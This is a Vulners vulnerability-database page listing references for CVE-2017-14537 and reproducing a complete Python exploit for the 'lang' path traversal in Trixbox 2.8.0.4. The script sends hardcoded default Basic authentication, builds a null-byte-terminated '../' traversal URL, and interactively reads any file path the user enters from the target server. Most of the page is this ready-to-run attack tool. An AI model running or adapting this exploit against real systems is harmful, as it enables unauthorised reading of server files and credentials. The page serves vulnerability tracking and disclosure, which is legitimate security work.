Vulners
Lucene search
Trixbox 2.8.0.4 - 'lang' Path Traversal
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Trixbox 2.8.0.4 - (lang) Path Traversal Exploit | 28 May 202100:00 | – | zdt |
 | CVE-2017-14537 | 28 May 202109:47 | – | circl |
 | CVE-2017-14537 | 16 Feb 201804:00 | – | cve |
 | CVE-2017-14537 | 16 Feb 201804:00 | – | cvelist |
 | Trixbox 2.8.0 - Path Traversal | 3 Jun 202606:04 | – | nuclei |
 | CVE-2017-14537 | 16 Feb 201804:29 | – | nvd |
 | CVE-2017-14537 | 16 Feb 201804:29 | – | osv |
 | Trixbox 2.8.0.4 Path Traversal | 28 May 202100:00 | – | packetstorm |
 | Path traversal | 16 Feb 201804:29 | – | prion |
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
# Date: 27.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14537
'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''
'''
Import required modules:
'''
import requests
import sys
import urllib.parse
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
'''
Construct malicious request:
'''
# Constructing header:
header = {
'Host': target_ip,
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Cookie': 'template=classic; lng=en; lng=en',
'Upgrade-Insecure-Requests': '1',
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
}
# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')
'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
print('')
exploit = requests.post(exploit_link, headers=header)
print('Contents of ' + base_link_addon_2 + ':')
for data in exploit.iter_lines():
data = data.decode('utf-8')
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
print(data)
else:
break
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2021 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24
CVSS 3.16.5
EPSS0.85497